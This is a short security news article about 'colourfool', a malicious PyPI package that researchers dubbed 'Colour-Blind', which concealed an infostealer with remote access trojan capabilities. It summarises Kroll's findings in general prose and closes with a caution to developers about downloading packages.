Malicious ’Colour-Blind‘ Infostealer with RAT Capabilities Discovered in PyPI
In a disturbing development, cybercriminals have been spotted stitching together strands of code extracted from various malware strains to develop their “own” derivatives.
After creating the digital equivalent of Frankenstein’s monster, perpetrators attempted to spread their unholy creation by dropping it into legitimate hubs such as PyPI, GitHub, RubyGems and NPM.
Recently, cybersecurity researchers discovered one such package called “colourfool” on the Python Package Index (PyPI). Dubbed “Colour-Blind” by the experts, the Python-written tool concealed a fully-fledged information stealer with remote access trojan (RAT) capabilities.
A “suspiciously large” Python file drew the attention of the researchers, who discovered its hidden purpose: to covertly retrieve a file from the Internet, conceal it from users, and execute it on the machine where it was downloaded.
“Other suspicious aspects of this script were the redirection of the standard out process to a ’null device,’ and the copying of the downloaded file into the same directory in which the interpreter ’python.exe‘ resides,” reads Kroll’s security advisory. “The copy functionality is preceded by a check, resulting in a forced exit if the file already exists. This is a common method the malware uses to avoid reinfection.”
Aside from its obvious info-stealer and RAT nature, “Colour-Blind” boasted antivirus software evasion capabilities and vestigial obfuscation techniques.
The researchers noted that threat actors could easily weaponize modern languages like Python to inject common malware functionality. Further analysis showed them that, like this particular malicious package, “multiple variants can be spawned from code sourced from others.”
This discovery highlights the need for developers to exercise caution when downloading packages, even from trusted platforms. While valuable for speeding up development and improving code quality, they could hide malicious code.